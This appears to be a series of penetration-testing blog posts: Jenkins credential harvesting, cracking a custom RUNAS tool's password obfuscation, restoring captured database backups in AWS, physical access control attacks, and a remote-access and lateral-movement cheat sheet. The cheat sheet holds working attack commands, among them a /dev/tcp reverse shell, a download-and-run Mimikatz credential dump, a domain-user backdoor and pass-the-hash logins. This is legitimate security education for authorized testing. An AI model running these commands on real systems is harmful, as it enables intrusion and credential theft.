Knowing What To Expect - os-file-list

It’s something every web application penetration tester comes across. You uncover a possible weakness, maybe a local file inclusion, directory traversal, or other vulnerability that could allow for interaction with the file system. What you need to verify the finding is a known file in a known location and, most of the time, testers tend to choose the old stand-by “/etc/passwd”.

But what happens when the web application firewall designer is wise to your penetration tester tricks and blocks on a trigger of “/etc/passwd”? What happens when the verification of this vulnerability is not the end of the finding but the start of your larger attack? Flexibility and a depth of options becomes more important and a larger list of potential local files can be very helpful.

os-file-list (  is a simple project designed to help penetration testers easily move past “/etc/passwd”, providing a base to cover various configurations and identify gaps in protections. os-file-list is a directory listing of world-readable files from the different Linux distributions available on leading cloud service providers. In addition to the world-readable files, we also provide readable file listings for a basic user with no special permissions as well as the default user created by the cloud service provider (e.g. admin/ec2-user/root). We found the basic user useful for when administrators create a limited user account (a best practice) for handling various tasks and the default user useful when an administrator failed to create a separate user.

The output is a simple one file per line format, easily included in directory enumeration tools such as Burp Intruder, or any custom written script. Additionally, the script used to generate the directory files is included in the project should anyone need to easily generate a custom listing.

Project URL:

Pillaging The Jenkins Treasure Chest

Jenkins is a popular target for penetration testers mainly because certain server configurations expose the Groovy Script Editor which, provided the proper payload, can lead to remote code execution on the server. More and more commonly though, this technique is working less and less.

Despite this, even if you don’t have access to the Groovy Script Editor, you still stand a decent chance of getting something valuable out of it. Jenkins tends to be a treasure trove of information in certain organizations, and it’s all too easy for a developer or operations team to leave something behind “just to get things done”.

A little background – Jenkins is an automation server for developers to automate the building of software, run tests on that software, etc. These “builds” that Jenkins runs, can contain things like the console output of the build process, (basically stdout of a bunch of commands and scripts), associated files in the form of “workspaces”, inherited environment variables, and much more. 

Let’s talk about a couple of these:

Console Output

During a pentest, we found a Jenkins server with hundreds of “builds”, each containing a handy button on the left side called “Console Output”.

Screen Shot 2019-06-20 at 2.37.34 PM.png

Intrigued, we clicked on it and saw what ended up being the literal stdout of the build process. Many of the builds’ console output we checked ended up being mostly useless, but some? Not so useless. A couple examples of what we’ve seen:

  • Curl/wget commands with plaintext creds to different services

  • Contents of certain automation scripts

  • Failed test cases containing SOAP requests & developer credentials

  • SSH private keys as part of a deployment script

  • Mysql client, JDBC connection strings, and sqlplus credentials

Interestingly, we saw that several instances of the exposed data were actually because some part of the build process failed, and data was exposed as error messages or stack traces. If the build succeeded properly, nobody may have known. This goes to show that failure conditions can be just as important, if not more than success conditions.

We found that the “Console Output” was in every build we came across and was a very reliable source of sensitive information.


Certain project builds are more complicated and require accompanying files to correctly build the project. They could be source code, private keys, certificate bundles, credentials, configs, or anything else. You can think of workspaces the same way you think of directory indexing on web servers.

Screen Shot 2019-06-20 at 3.11.59 PM.png

Workspaces did not appear in as many builds as the console output did, but tended to contain even more sensitive information. A couple of things we found from workspaces:

  • “Protected” source code

  • Many web.config files containing DB connection details

  • .ssh folders with private keys & known hosts files

  • Client certificates & credentials for connecting to APIs

  • Included, but unused scripts containing hardcoded credentials

  • AWS deployment ID & secret keys

We found that workspaces tended to have a lot of data they didn’t need. After all, it’s easier to include a whole directory structure, than specifically say which directories are important or not.

Environment Variables

It’s well-known within the developer community that including credentials in source code is a pretty big no-no. Despite this advice being often ignored, some developers follow the guidance of “include credentials and API keys as environment variables” which is better. Well, Jenkins can expose those too.

You can configure certain builds to inherit particular environment variables that the build can refer to during its creation process. Things we’ve seen from exposed environment variables:

  • Internal network information for where the build if being deployed

  • Credentials

  • Proxy settings

  • Paths, usernames, emails, and admin URLs

Tool Release

These techniques have been used to compromise multi-billion-dollar corporations and are incredibly useful in today’s application development landscape. If you come across a Jenkins server during a pentest, we highly recommend taking a look at the accessible internals. Unfortunately, grabbing all these pieces manually from the web interface can be tedious and a hassle. We are releasing Jenkins-Pillage to automatically gather this information more quickly and easily.

Pentest Deep-Dive: Custom RUNAS

Information Security often exists in a delicate balance with business demands. Organizations weighing security against functionality, cost, ease-of-use, or time for development, commonly choose imperfect but realistic compromises.

For the most part, these compromises allow for progress towards business objectives while maintaining an acceptable balance. Other times—especially in the absence of a proper security evaluation—organizations can inadvertently deploy solutions that drastically increase their risk.

During a recent internal network penetration test we came across a prime example of an unbalanced solution. To solve the old problem of "How do we allow our users to install approved applications on their systems?" this organization developed a custom solution in-house. Installation scripts for the approved applications were placed within a directory on the C:\ drive and, via an easy-to-use GUI, users could select which program to install, triggering the associated script.

As a security consideration within this environment, users were not administrators on their assigned systems. However, most of the approved applications require administrator privileges to install.

As a security inconsideration, all the user workstations have been configured with a shared local administrator password so a single version of the script could be deployed on every system.

At some point, we imagine the idea was floated to use the RUNAS command in a batch file to execute the installation as the local administrator. However, RUNAS expressly does not accept including a password on the command line as doing so would inevitably lead to weak deployments. As described by Microsoft’s Raymond Chen:

This was a conscious decision. If it were possible to pass the password on the command line, people would start embedding passwords into batch files and logon scripts, which is laughably insecure.

Raymond kindly offers an option for those looking to head down this bad decision rabbit-hole in the form of creating a custom executable using the “CreateProcessWithLogonW function, which does allow for plaintext passwords from the command line. And as such, a custom executable which solved this corporate need was born. For the context of this writeup we will call this RUNAS_A.exe.

At first glance we can see the developer attempted to avoid using plaintext passwords as command line arguments by instead requiring an encrypted value. An example of this:

     RUNAS_A /user administrator /pass <EncryptedPassword> “C:\installApp\install.bat”

But wait, couldn’t any user run any command as the local administrator by merely using the same command line string with a different command? e.g.:

     RUNAS_A /user administrator /pass <EncryptedPassword> “C:\evilApp.exe”

You guessed it. A static value whether “encrypted” or not does not prevent abuse given the design of this application. Given this knowledge, an attacker could perform horizontal and vertical (per system) privilege escalation to all machines sharing the Local Administrator credential.

Lets dive a little deeper…

When first looking at the RUNAS_A command string, we noticed the password value was base64 encoded. For example:

     RUNAS_A /user admin /pass lkB6RJYwDDFtbxckaGeaUuQwWnXpcAsuHEmaMNAhrQ== “C:\installApp\install.bat”

Our hopes that someone had made the classic mistake of confusing encoding with encryption were soon dashed as the decoded password string had likely been encoded to avoid either unprintable or control characters.

Decoded Encrypted Password

Decoded Encrypted Password

The password was easily decoded but still encrypted. With access to the RUNAS_A executable, we took a look to see what it was doing regarding encryption. Before starting up any serious reversing effort, we tried running the application with no options provided.

Running RUNAS_A.exe

Running RUNAS_A.exe

One of the options of RUNAS_A is an "encryption mode" to let you encrypt passwords before use. Let's try a quick known-plaintext attack to see if we can figure out what is going on.

Encrypting a Password with RUNAS_A.exe

Encrypting a Password with RUNAS_A.exe

Decoding our base64 output gives us the encrypted password.

Decoded Encrypted “testpassword” Password

Decoded Encrypted “testpassword” Password

Time to take a look at the output and identify the encryption algorithm? After merely looking at it for a second, we realize the “encryption” involves placing a random character between every other character of the password.



Taking another look at our original encrypted password from the batch file we can see it will “decrypt” to: “@D01o$gROup.IO!” which, for the purposes of this writeup, is the shared local administrator password.

Decrypted Original Password

Decrypted Original Password

Another bittersweet moment in information security where, as the riddle is solved, the horrible truth is revealed. Not only is encrypting the password useless in attempting to restrict use of the credentials but the encryption itself is useless in preventing anyone from learning the plaintext of the password. We have seen CTF puzzles designed for children that have provided a greater cryptanalysis challenge than this application.

Diving a bit deeper into the RUNAS_A executable, using ILSpy as RUNAS_A.exe is .NET, we can see that the "encryption" function "EncodePID" involves pairing up random characters with the characters of the password and then base64 encoding the string.

Encryption Function

Encryption Function

The “decryption” function is similarly simple, pulling out every other byte from the “encrypted” password.

Decryption Function

Decryption Function

Ultimately what we have here is a poorly balanced solution and a study in avoidance. There was a need for deploying software, on demand, to end-users. To avoid making every user a local administrator; a single administrator account is reused for every system. To avoid the security restrictions of a commercially available tool; an insecure, in-house application was developed. To avoid the appearance of plaintext credentials within the installation scripts, pointlessly “encrypted” credentials were used. Finally, the golden rule of “Don’t Roll Your Own Crypto” was avoided in spectacular fashion.

Frustratingly to the InfoSec mind, this security train wreck of a solution has been functioning without issue since it was developed and deployed in 2006. The original perpetrators have long since left the organization and, as the application itself has not been a squeaky wheel, it has gotten no security grease.

Hidden issues like these are the sort of findings a penetration test can uncover. Vulnerability scanning will never identify issues like these within a custom application, there will never be a vendor patch or update, and it's too vital an application to just decommission for no reason. A quality penetration test can not only discover problems like this but help demonstrate what the exact impact could be, make the argument as to why things need to change and offer advice on bringing you program back into balance.

Restore a SQL Server Database to AWS

It happens to all testers eventually. You come across a file share hosting dozens of database backups. Giddiness ensues as you realize you have full read access and can copy any of them down to your dropbox, until you notice the database backups are tens, if not hundreds, of gigabytes in size. However, in this particular situation you simply have neither the hard drive space nor bandwidth to pull down a massive database backup and boot up a virtual machine to search through the data in a timely fashion.

Cue Amazon Web Services (AWS). We can upload the database to a secure, non-public S3 bucket and have Amazon Relational Database Service  (RDS) restore the database directly. This means that we can have access to that data in as little as 10 minutes while all the “heavy lifting” is performed by the cloud.

***NOTE: This script can help you demonstrate the impact of test findings without overtaxing your time or hardware but remember to always discuss the potential use of cloud technology during the engagement with your clients before testing begins.

Unfortunately, AWS likes to complicate things and there are quite a few steps involved in performing those two actions. At the bottom is a link to a bash script that will handle the entire exchange. The input is simply the database backup file to be uploaded, as well as the name of the database. After successful uploading and restoration you are provided with a table count and connection details for further queries.

Running without any arguments:

$ ./
usage: ./ options
This script restores a SQL Server database backup to AWS and returns
connection details & a table count

   -h      Show this message
   -f      The SQL Server Database backup file (usually .bak)
   -d      Database Name (ex. MYDATBASE)

Running on a test database:

$ ./ -f /mnt/FileSrv_IP/DB_Backups/JulyDatabaseBackup.bak -d THISISMYDATABASENAME
[*] Creating S3 Bucket to store database backup: s3-sql-restore-wi41zjcsdg
[*] Uploading backup file (/mnt/FileSrv_IP/DB_Backups/JulyDatabaseBackup.bak) to S3 bucket (s3-sql-restore-wi41zjcsdg)
upload: ../JulyDatabaseBackup.bak to s3://s3-sql-restore-wi41zjcsdg/JulyDatabaseBackup.bak
[*] Creating a VPC security group allowing TCP1433 inbound for RDS
[*] Creating the IAM Role & Policy so RDS can access S3
[*] Creating an option group (option-group-sql-restore) to hold the SQLSERVER_BACKUP_RESTORE option for RDS
[*] Adding the SQLSERVER_BACKUP_RESTORE option to option-group-sql-restore group
Username: user34wkeceq
Password: pass9zoacs5
[*] Creating the RDS SQL Server Database - db-sql-restore-rwkmm7hog ~15mins
[*] RDS SQL Server now starting
RDS Still coming up...may take a few minutes
RDS Still coming up...may take a few minutes
RDS Still coming up...may take a few minutes
[*] SQL Server hostname:
Username: user34wkeceq
Password: pass9zoacs5
[*] Restoring the SQL server database from S3
[*] still restoring the DB
[*] still restoring the DB
          1 RESTORE_DB                                         THISISMYDATABASENAME                                                    [2019-01-18 1 2019-01-18 16:42:22.087 2019-01-18 16:41:15.730 arn:aws:s3:::s3-sql-restore-wi41zjcsdg/JulyDatabaseBackup.bak                                                                                                                                                                                                                                                                                                      0 NULL
[*] Row count for all tables in the database
Changed database context to 'THISISMYDATABASENAME'.
------------------------ -----------
sysclones                          0
<SNIP>                          1220
sysschobjs                      2428

(94 rows affected)
[*] Run whatever SQL queries you want with:
sqlcmd -S -U user34wkeceq -P pass9zoacs5

Now, while the script relies on Mircosoft’s “sqlcmd” to run the stored procedures automatically, there is nothing stopping you from connecting with something like SQL Server Management Studio for autocomplete and other features.

The tool can be found here:

Inside the wire at GSX 2018

This Tuesday at the ASIS Global Security Exchange (GSX) in Las Vegas, Mike Kelly and I presented our talk “Network Attacks Against Physical Access Controls” covering our experiences attacking organizations’ physical security controls post network compromise. This is a topic we had spoken about before at other conferences (HushCon, THOTCON) but the GSX was our first opportunity to move this conversation outside the strictly Information Security community, and speak directly with the type of people and organizations that would be on the receiving end of these types of attacks.

Mike and I work as penetration testers and Red Team members, assessing the security of computer networks, systems, facilities and personnel for numerous organizations. Most commonly, our clients are responsible for I.T. or Information Security at their organizations and requests for physical security testing would primarily focus on a basic scenario of: “Can an attacker leverage physical access to our facility to gain access to our internal network?” Findings for these physical security engagements would detail the methods an attacker, without network access, would use to physically compromise a location to gain a network foothold. This attack methodology provides value to the Information Security team, where protecting IT resources is the overall goal and where physical compromise is a means by which an attacker may attempt to bypass other defenses.

What we found missing from this methodology was a broader understanding and assessment of the physical security perimeter as a target itself. When we consider physical security controls as more than just a barrier protecting the network and instead think about their role protecting the physical security and safety of the entire organization we find that many of more common attack tactics and techniques fall short of assessing the complete physical security attack surface.

Understanding where your perimeter begins is a vital part of building a comprehensive security program. It’s easy to say that the physical security perimeter starts at the edge of the property, the main gate or the limit of the security camera’s field of view but these fail to consider the current level of connectivity found in the majority of organizations. Physical Access Control Systems (PACS) hardware and software has evolved from using dedicated equipment, cabling, and protocols to being near plug-and-play with the rest of the network. At the same, the explosion of internet-based attacks against organization’s networks and personnel has effectively expanded that physical security perimeter to include the entire world.

In our presentation we talked about how physical security testing is progressing; moving past some of the more traditional techniques such as lockpicking and tailgating or piggybacking and more recent methods like long-range RFID badge cloning. We provided with a number of examples of different techniques we had put into practice during engagements targeting physical access control systems after achieving a level of unauthorized network access.

The first method we covered involves attacking the PACS hardware/firmware directly. During a Red Team test, Open Source Intelligence (OSINT) gathering revealed the exact model of door controller installed at the target facility. After acquiring one of the devices, Mike discovered a weakness in the system’s communication protocol (CVE-2017-16241) and developed a working exploit. As a result, we were able to remotely unlock the doors of the targeted facility, including those protected by biometrics. Similar research into these type of systems is ongoing with the most recent example being Google’s David Tomaschik talk, “I'm the One Who Doesn't Knock” at DEF CON 26.

Next, we spoke about attacks against the PACS backend systems and supporting infrastructure. These fall in line with what we would see in network penetration test. Instances of improperly stored database backups containing badge numbers, PACS software with default credentials (including unchangeable passwords), unencrypted communications, and a lack of network segmentation result in the capture of sensitive badge credentials, and the ability to assume direct control of employee badging and surveillance camera systems.

Finally, we covered exploiting common user errors to gain physical access. These often follow a pattern of weak password selection combined with a failure to understand the sensitivity of the information like employee badge numbers. While most people would pause before emailing a spreadsheet full of unencrypted passwords, a list of employee badge numbers may not elicit the same caution. Compromising one employee email account can lead to an attacker having all of the information needed to create functional clones of employee badges for the entire organization.

One of our main motivations for presenting at GSX was the opportunity to speak with the people at the intersection of information and physical security. The separation of responsibilities between an organization’s information security team and the operations/physical security team can complicate communicating the level of risk revealed by this type of testing and opportunities to bridge that gap are key. The Q&A session and discussions we enjoyed with our audience and the other attendees at GSX provided us with valuable insight into the challenges facing all of us as we continue to work towards a more secure world.

For more information on this topic, please feel free to contact us at

Remote Access Cheat Sheet

Since the advent of networked computers, administrators have had a legitimate need to remotely control systems. Several technologies have emerged to facilitate this including built-in solutions as well as third-party options. As the list grows, pentesters/attackers have a growing list of options at their disposal; however we haven't found a good resource that catalog's them for quick reference. 

In coordination with @atucom and @thejosko's talk "Not Your Daddy's Winexe" presented at Thotcon 0x9, we have assembled this cheat sheet for remotely accessing systems. Many/most of the following methods will require pre-existing knowledge of credentials, or access to a machine that will be leveraged for lateral movement. 

If you see any of the following ports open, the corresponding technologies might be configured to allow remote access:


Remote Desktop Protocol (RDP)

RDP is Microsoft's built-in remote desktop solution that ships with all versions of Windows. The service is not listening by default, but it is commonplace to enable it in corporate environments. 

Port: 3389/TCP

Tools: Microsoft Remote Desktop Client (Windows/Mac), rdesktop, xfreerdp


  • C:\Windows\System32\mstsc.exe
  • rdesktop -g 80%
  • xfreerdp /u:josh /d:testlab /pth:64f12cddaa88057e06a81b54e73b949b /v:

Virtual Network Computing (VNC)

VNC was created as a vendor agnostic graphical desktop solution and is widely deployed in *nix environments. Historically it was commonly deployed without authentication. Modern servers strongly urge administrators to configure a password. 

Port: 5900/TCP

Tools: The plethora of open-source VNC applications, RealVNC, TightVNC, Screen Sharing (Mac)


  • vncviewer

Apple Remote Desktop (ARD)

ARD is Apple's graphical remote desktop solution. The service is not listening by default, and in our experience it is not widely deployed. 

Port: 3283/UDP (v1), 5900/TCP (v2)

Tools: Screen Sharing, VNC applications


  • /System/Library/CoreServices/Screen
  • vncviewer


The Xorg Foundation create and maintain's the widely deployed X11 windowing system used in most *nix environments. Most administrators are aware that the client-server model allows forwarding of X-sessions over SSH tunnels; however, when configured to allow TCP sessions, the X-session can be attached to remotely. The default X11 configuration was changed to disallow TCP sessions several years ago, but we still see it from time to time. If you see TCP 6000+N open, you can likely execute code on that machine or remotely log keystrokes.

Port: 6000+N/TCP, (or 22/TCP via SSH)

Tools: xspy, xwatchwin, xwd, xvkbd, ssh, MSF,

Example screenshot:

xwd -root -screen -silent -display > screenshot.xwd

Example keyboard injection:

xvkbd -no-repeat -no-sync -no-jump-pointer -remote-display -text "/bin/bash -i > /dev/tcp/<&1 2>&1\r"

Example remote keylog:


System Center Configuration Manager (SCCM) Remote Control

SCCM is often used in enterprise networks to handle patch deployment for workstations and servers, as well as help facilitate installation of applications to groups of managed systems. When configured through the administration console, managed systems can be configured to start a remote control service (System Center Remote Control). While it provides similar functionality to RDP, it does not leverage Terminal Services, and in certain configurations can allow full control of a remote system without alerting logged-on users to the session hijack. 

Port: 2701/TCP

Tools: CmRcViewer.exe, SCCM Admin console

Note: If you are not inclined to download a random executable from the Internet(duh), the SCCM Remote Control client can be found at C:\Program Files (x86)\Microsoft Configuration Manager\AdminConsole\bin\i386\ after installing SCCM. Be warned, setting up an SCCM lab is unfathomably complicated.


Modern operating systems no longer leverage telnet, but we still see it on almost every pentest on embedded devices, or legacy systems. The old skool command line console access operates as a cleartext protocol and has largely been replaced by SSH. 

Port: 23/TCP

Tools: Telnet, Netcat (nc), Ncat


  • telnet
  • nc 23
  • ncat 23


The Berkeley alternate to the Telnet standard was used on *nix systems for decades before being replaced by SSH. Rather than requiring user/password auth, administrators could specify source machines that were considered authenticated via a .rhosts file. Rlogin is an interactive shell, similar to telnet. Rsh can be used to execute a single command. 

Port: 512-514/TCP

Tools: rlogin, rsh, remsh, rexec, rcp


  • rlogin -l josh
  • rsh -l josh "ping -c4"

Secure Shell (SSH)

It's everywhere in the *nix world, and has a ton of features built in that us attackers can leverage for pivoting, tunneling X-sessions, file transfers, etc.. 

Port: 22/TCP

Tools: ssh, PuTTY


  • ssh root@

Server Message Block (SMB)

SMB has been leveraged for file administration on Windows and *nix systems for decades. Another feature often abused by attackers is the use of administrative shares (C$, ADMIN$, IPC$) to push a service binary to a target machine, then start the service for semi-interactive I/O. SysInternalsSuite includes the PsExec binary which is largely credited for developing and leveraging this technique. Local administrative privileges are required to push the service binary to the ADMIN$ share, after which an RPC/SVCCTL call creates and starts the remote control service. IPC$ is leveraged to create named pipes for input and output which act as a semi-interactive shell. 

Port: 445/TCP (SMB), 135/TCP (RPC), High-random port

Tools: PsExec,exe, (impacket), winexe, MSF, smbexec


  • PsExec.exe \\ -u josh -p Password1 cmd.exe
  • winexe --system --uninstall -U testlab/josh%Password1 // cmd.exe
  • 'josh':'Password1'@ cmd.exe
  • 'josh':'Password1'@ cmd.exe

Windows Remote Management (WinRM)

WinRM was Microsoft's implementation of the open WS-Management standard for SOAP-based remote management. Microsoft includes several standalone tools (winrm, winrs) and is also the underlying technology used for PowerShell Remoting. Under the surface, WinRM makes use of WMI queries, but can also leverages the IPMI driver for hardware management. It's a terribly powerful tool, albeit not a widely deployed yet due to its relative infancy. 

Port: 5985/TCP (HTTP), 5986/TCP (HTTPS)

Tools: winrm, winrs, PowerShell Remoting

Example list services:

winrm get wmicimv2/Win32_Service –r:

Example execute ipconfig (or any other code):

winrs /r:WIN-DEHIB5FROC2 /u:josh /p:Password1 ipconfig

Example PSRemote cmdlet on remote system:

PS> Invoke-Command {Get-Service *}

Example PSRemote interactive PS Session:

PS> Enter-PSSession -ComputerName -Credential testlab\josh
PS> ...
PS> Exit-PSSession

Windows Management Instrumentation (WMI)

WMI is Microsoft's consolidation of system management under a single umbrella. It is leveraged heavily under the hood for local operation, but can also be used for remote execution. Several built-in tools exist for either WQL query execution, or full code execution. Impacket includes wmiexec which also provides a semi-interactive shell. 

Remote WMI queries used RPC/DCOM as the communication bus.

Port: 135/TCP (RPC), plus one high-random TCP (DCOM)

Tools: winrm, winrs, PowerShell Remoting

Example list services:

wmic.exe /USER:"testlab\josh" /PASSWORD:"Password1" /NODE: service get "startname,pathname"

Example execute code (add user):

wmic /USER:"testlab\josh" /PASSWORD:"Password1" /NODE: process call create "net user hacker Str0nGP_$sw0rd /add /domain"

Example list services (via PS cmdlet):

PS> Get-WMIObject -ComputerName -query "Select * from Win32_Service"

Example list processes (via linux wmic util):

pth-wmic -U testlab/josh%Password1 // "select csname,name,processid,sessionid from win32_process"

Example semi-interactive shell (impacket): 'josh':'Password1'@

Scheduled Tasks 

Tasks, that are, scheduled. In addition to running commands locally, the built-in schtasks utility leverages RPC/DCOM to schedule tasks on remote machines. On legacy Windows machines At.exe performed this functionality, but was deprecated for SchTasks in modern platforms. Application firewalls that block Schtasks may still allow At, a good reason to attempt both if necessary. 

Port: 135/TCP (RPC), plus one high-random TCP (DCOM)

Tools: schtasks, at


  • schtasks.exe /Create /S /U testlab\josh /P Password1 /TR "C:\Windows\System32\win32calc.exe" /TN "pwnd" /SC ONCE /ST 20:05
  • at.exe \\ 20:25 cmd /c "C:\Windows\System32\win32calc.exe"

Microsoft Management Console (MMC2.0) Application Class

In 2017, Matt Nelson released research into methods for lateral movement using DCOM. We strongly urge you to review his research for full details (it's worth the read). Reviewing all the intricacies of DCOM is outside the scope of what can/should be covered in a "cheat sheet", but leave it to say the MMC2.0 application class can be accessed remotely over RPC/DCOM, and exports the ExecuteShellCommand method which can be used to... Execute..a..Shell..Command.

MMC requires local admin due to the nature of the application, and will be blocked by the default firewall rules. BUT, we've seen enough networks that disable host firewalls to make good use of this technique. 

Port: 135/TCP (RPC), plus one high-random TCP (DCOM)

Tools: native .NET calls on Windows

Example code execution:

PS> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application",""))
PS> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\calc.exe",$null,$null,"7")

Example Invoke-Mimikatz (listener started on

PS> [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("IEX (New-Object Net.WebClient).DownloadString(''); Invoke-Mimikatz -DumpCreds > C:\\Users\\josh\\Desktop\\mimi.txt"))

PS> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application",""))

ShellWindows Object

A few weeks after his initial research on MMC lateral movement, Matt Nelson published more research targeting DCOM objects that lacked an explicit LaunchPermission attribute. Read his post here for a thorough review of the techniques shown below.

Successful auth over RPC is required; however, regardless of privilege the code will execute as a child of the explore.exe process with limited privileges. No scaping memory directly with this method.. :(

Port: 135/TCP (RPC), plus one high-random TCP (DCOM)

Tools: native .NET calls on Windows

When invoking .NET calls in this fashion, the existing auth token is used. Great for lateral movement from a compromised system, but not if you are remotely accessing a target machine with recovered credentials. The simplest method we have found is to create a new PS Session with runas.

Example auth:

PS> runas /netonly /user:TESTLAB\josh "powershell.exe"

Example code execution:

PS> $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"")
PS> $obj = [System.Activator]::CreateInstance($com)
PS> $item = $obj.Item()
PS> $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)

Example: call shutdown routine (user prompted for confirmation):

PS> $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"")
PS> $obj = [System.Activator]::CreateInstance($com)
PS> $item = $obj.Item()
PS> $item.Document.Application.ShutDownWindows()

Example troll: launch IE with Sloths in Space (10 hours):

PS> $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"")
PS> $obj = [System.Activator]::CreateInstance($com)
PS> $item = $obj.Item()
PS> $item.Document.Application.ShellExecute("iexplore.exe","","C:\Program Files\Internet Explorer",$null,"1")

ShellBrowserWindow Object

Functionally the same as the previous method, the ShellBrowserWindow object can be leverage for remote code execution over DCOM

Port: 135/TCP (RPC), plus one high-random TCP (DCOM)

Tools: native .NET calls on Windows

When invoking .NET calls in this fashion, the existing auth token is used. Great for lateral movement from a compromised system, but not if you are remotely accessing a target machine with recovered credentials. The simplest method we have found is to create a new PS Session with runas.

Example auth:

PS> runas /netonly /user:TESTLAB\josh "powershell.exe"

Example code execution:

PS> $com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"")
PS> $obj = [System.Activator]::CreateInstance($com)
PS> $obj.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)